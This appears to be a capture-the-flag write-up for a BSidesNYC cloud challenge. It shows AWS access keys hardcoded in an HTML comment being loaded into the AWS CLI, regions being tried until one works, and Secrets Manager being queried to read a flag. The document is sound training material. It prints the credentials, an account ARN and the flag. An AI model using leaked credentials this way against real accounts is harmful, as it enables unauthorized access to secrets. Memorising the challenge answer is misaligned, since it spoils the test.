BSidesNYC CTFd Writeup - Secure
The objective is to find a hidden flag by exploiting a common cloud security misconfiguration: exposed credentials in publicly accessible source code. The primary tool used is the AWS Command Line Interface (CLI).
Step 1: Reconnaissance and Credential Discovery
The initial entry point is the web page's HTML source code. A quick inspection reveals a developer comment containing hardcoded AWS credentials. This is a critical vulnerability.
- Vulnerability: Hardcoded AWS Access and Secret keys.
- Full Source Code:
<!DOCTYPE html>
<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>CTF: Secret Page</title>
</head><body> <h1>Welcome to our Secret Page!</h1> <p>We're working hard to secure our systems.</p>
<!-- TODO: Implement proper authentication -->
<!-- Debug information: Consider rotating these keys soon. AccessKey=AKIASHAHEEXSUMADBTWK SecretKey=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 -->
<p>More content here...</p></body></html>
- Discovered Credentials:
- AccessKey:
AKIASHAHEEXSUMADBTWK - SecretKey:
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
- AccessKey:
Step 2: Configuring the AWS CLI
With the credentials in hand, the next step is to configure the AWS CLI to interact with the target AWS account. This is done using the aws configure command.
└─$ aws configure
AWS Access Key ID [None]: AKIASHAHEEXSUMADBTWK
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
Step 3: Enumeration and Finding the Correct Region
AWS resources are region-specific. A common task in cloud CTFs is to identify the correct region where resources are deployed. This was done through trial and error.
Attempt 1 & 2 (Incorrect Regions): Initial attempts with invalid region names like US and US-East resulted in connection errors because they are not valid AWS region identifiers.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
Could not connect to the endpoint URL: "https://secretsmanager.US-East.amazonaws.com/"
Attempt 3 (Empty Region): Configuring the CLI for us-east-1 was successful, but listing secrets returned an empty list, indicating this was not the correct region for our target.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws configure
Default region name [US-East]: us-east-1
...
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
{
"SecretList": []
}
Attempt 4 (Successful Enumeration): Finally, configuring the CLI for the us-east-2 region and running the list-secrets command successfully revealed a secret named flag.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws configure
Default region name [us-east-1]: us-east-2
...
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager list-secrets
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-2:152486290917:secret:flag-4gaYor",
"Name": "flag",
...
}
]
}
Step 4: Retrieving the Flag
With the secret's name (flag) and the correct region (us-east-2) identified, the final step is to retrieve its value using the get-secret-value command.
┌──(cicada㉿kali)-[~/Downloads]
└─$ aws secretsmanager get-secret-value --secret-id flag
The command returned a JSON object containing the flag within the SecretString field.
{
"ARN": "arn:aws:secretsmanager:us-east-2:152486290917:secret:flag-4gaYor",
"Name": "flag",
"VersionId": "d1f17d56-e428-4cef-a7c7-8dcdba83b2bd",
"SecretString": "{\"Flag\":\"flag{8fde1ffcfc22a4317b4bad9fc850a8b8}\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-10-13T22:24:23.121000-04:00"
}
The captured flag is flag{8fde1ffcfc22a4317b4bad9fc850a8b8}.
